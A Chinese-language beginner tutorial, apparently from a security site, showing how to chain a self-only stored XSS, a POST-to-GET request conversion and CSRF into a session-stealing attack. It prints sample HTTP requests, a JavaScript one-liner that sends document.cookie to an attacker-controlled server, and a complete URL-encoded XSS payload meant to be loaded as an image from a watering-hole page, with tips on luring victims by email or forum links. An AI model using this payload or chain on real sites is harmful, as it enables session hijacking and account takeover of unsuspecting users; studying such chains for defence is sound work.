神刀安全网

新手教程:如何利用CSRF执行XSS攻击

我将拿出最近发生的一个例子,讲解如何将一些低级别的风险连接起来形成一个向量,然后达到攻击的目的。

背景介绍

首先介绍背景条件,我发现一个网站的用户资料页面上有一个持久性XSS漏洞。然而只能是用户修改自己的用户名,针对自己触发XSS。其它用户都不能遇到这个XSS攻击。

看起来难以利用,对不对?我们一般都会这样想,通常认为它只是一个风险,有时候会修复它,但是一般都不会,毕竟无法利用它。

要是能有一个利用办法就好了——幸运的是,这个网站还有两个漏洞,我可以构造一个POC来利用session。

POST转为GET

第一个漏洞是,网站允许将一个POST verb的HTTP请求使用GET verb发送。作为演示,一个POST请求在HTTP请求的body中被发送,比如:

POST /user-config HTTP/1.1 Host: dodgy.evilsite.co.uk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cookie: SESSION=abcdef123 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 244firstname=dave&username=tautology

但是,GET请求是在HTTP请求的URL中发送的,比如:

GET /user-config?firstname=dave&username=tautology HTTP/1.1 Host: dodgy.evilsite.co.uk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cookie: SESSION=abcdef123 Connection: close

这意味着,如果我们能欺骗服务器使之接受一个GET请求,我们就可以构造一个能够点击执行的URL,比如构造上面的例子:

http://dodgy.evilsite.co.uk/user-config?firstname=dave&username=tautology

这恰好将我们引向了另外一个漏洞

跨站请求伪造CSRF

跨站请求伪造(CSRF或者XSRF),最基本的是使用URL和一个已建立的会话,以你的身份替你做一些事情。

让我再更清楚得解释一下。因为HTTP被设计为无状态,比如,每个请求都被认为是一个独立的请求,为了使一个会话能被记住,使用了session cookie,它会在每次请求中传递。

这个方案中,浏览器会替你做所有复杂的工作,如果我有了dodgy.evilsite.co.uk的cookie,浏览器会给发往这个网站的所有请求附带cookie。

这意味着如果我能加入代码,以我构造的URL访问visit dodgy.evilsite.co.uk,就会在他们的权限下执行一些任务。

让对方点击一个URL是简单的,只需要一点社会工程学,这可以通过发送email链接,或者用户常去的论坛链接完成。最简单的实现方式是搭建自己的web服务器,也就是被称作建立“水坑”的战术。

有一个重要的东西挡在我们前面:浏览器的同源策略。这个策略使得如果我们使用复杂的调用,比如 XMLHttpRequest,只能请求相同的域名,或者跨域资源共享(CORS)策略允许的域名。

我们没有目标服务器的CORS策略,所以我们不得不使用稍微低级的技术,比如以image的方式加载页面。<img>HTML标签的一个很好的特性是,它不关注返回的数据是什么,并且浏览器也会忽略它不能理解的内容。

不足之处是我们只能使用GET方法。

结合起来

现在,我们满足下面的条件:

1、可以在客户端的session中执行定制的JavaScript

2、我们能用CSRF漏洞向服务器发送一个定制的GET请求

3、我们可以把POST请求转为GET请求

这些是漏洞利用成功的所有条件。首先要做的事情是创建一个在客户端的session里执行的JavaScript。最好的方法是使用XMLHttpRequest创建一个HTTP请求,带上会话的cookie发往我们控制的服务器。如下:

x=new XMLHttpRequest();x.open(‘GET’,’https://www.evilsite.co.uk/’+document.cookie,false);x.send();

我们需要在用户不知情的情况下进行攻击,所以我们把它放到XSS漏洞利用代码中。

https://dodgy.evilsite.co.uk/user-config?form-firstname=Dave%27+%2F%3E%3Cscript%3Ex=new XMLHttpRequest();x.open(‘GET’,’https://www.evilsite.co.uk/’%2bdocument.cookie,false);x.send();</script><div id=’

末尾的 <div id=’是为了保证在XSS攻击后掩盖剩下的HTML,这样就不会留下任何可疑的痕迹。

我们将会把它放到一个水坑网站上,作为一个image来加载,只需要用再增加一些基本的内容就可以将之放进去。

因此,我们的第一个任务是创建一个简单的没有漏洞利用代码的web页面。为此,我借用了xkcd( http://www.xkcd.com/565/ )的漫画,因为这个页面处于知识共享署名许可协议(creative commons attribution licence)的许可之下,我可以使用它。

下面是我的网站:

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 新手教程:如何利用CSRF执行XSS攻击

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址